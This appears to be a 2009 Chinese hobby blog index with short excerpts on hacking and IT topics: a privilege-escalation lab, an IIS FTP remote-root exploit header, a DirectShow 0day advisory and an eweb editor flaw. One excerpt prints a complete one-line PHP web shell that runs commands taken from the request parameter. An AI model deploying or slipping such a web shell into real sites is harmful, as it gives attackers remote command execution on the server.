greyair's blog
百度空间 | 百度首页 
 
文章列表
 
2009-11-08 18:52

原文:http://hi.baidu.com/appcn/blog/item/43c4eafce7888042d6887df9.html

在安装虚拟机VMware tools之前,你需要知道如下概念:
(1)虚拟机有免安装绿色版,也有非免安装绿色版,一般非免安装绿色版在你安装

 
2009-11-08 07:30

实验:提权攻击

一、实验目的

通过实验掌握在Linux系统中,以普通用户身份登录的用户。在没有注销的情况下,黑客如何利用一段

 
2009-09-16 13:33

来源:老鹰天下

编译不通过可以对比以下的的exp

http://www.milw0rm.com/exploits/1742

两个代码相似度几乎为95%

当然作者没啥恶意

输出了Bad.handshake,其他貌似啥没做。

本人水平有限,只知道这么多

 
2009-09-04 00:00
难得出一个这么强大的远程漏洞。。。
附EXP:
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
 
2009-08-27 20:46

有用户在Google的帮助论坛发贴,投诉……Google不会计算减法!请看下图:

这个结果显然应该是1,但是Google却给出了0的答案。而Yahoo和Bing对此的计算都是正确的。

 
2009-08-13 14:04

PS:转的,很长。

每当夜幕降临。
哥总是拖着疲惫的身躯
把我那泛黄的迷彩服脱掉,
换上了我从夜市第三个摊子买来的非主流服装。
昏黄的路灯下
有一道孤寂的身影走进了小巷深处的一家网吧
留下的只有寂寞的背影
没错,那就是哥
熟悉的走到了吧台的位置
拿出了8元人民币
淡淡的说了句 “包夜”
吧台新来的女网管,对我投出了一道暧昧不明的微笑
哥无奈的摇了摇头。
淡然的接过了那张临时卡。
在大家的心目中,我永远是个温柔而又不爱说话的哥
但是

 
2009-07-31 11:40

用SQL语句添加删除修改字段
1.增加字段
     alter table docdsp    add dspcode char(200)
2.删除字段
     ALTER TABLE table_NAME DROP COLUMN column_NAME
3.修改字段类型
     ALTER TABLE table_name    ALTER COLUMN column_name new_data_type
4.sp_rename 改名
     更改当前数据库中用户创建对象(如表、列或用户定义数据类型)的名称。
  

 
2009-06-05 14:35

DirectShow 0day是一个中率极高的0day漏洞,目前已经开始在网上爆发,其攻击形势不亚于去年的IE7 0day以及往年的ANI 0day。

攻击特性如下:

1.使用了.NET SHELLCODE技术,机器上装有.net framework就会中招。

2.利用XP自带的Windows Media Player播放漏洞媒体文件触发。

3.Internet Explorer和Firefox 通杀。

4.所谓的微软MSRC的killbit临时解决方案后,至少有两个以上clsid和HTML标签可以变相加载Windows Media Player播放漏洞媒体文件。

解决方案:

 
2009-02-28 05:50

作者:skyfire[B.H.S.T]

源码:

<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>

 
2009-02-13 15:07

作者:oldjun

这个漏洞可以很鸡肋,也可以很致命,关键看你怎么利用!

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:

' 把带"|"的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 删除新闻相关的文件,

 
     
 
 
个人档案
 
greyair
男, 23岁
上次登录:
1天前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
 
     
 
最新评论
 
     
 
好友最新文章
 
     
 
最近访客
 
 

黎明时的流星

吾不知鱼

pythond

dycmc

lixiaodaoaaa

羊羊爱上元气

etah

好名字我注册
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu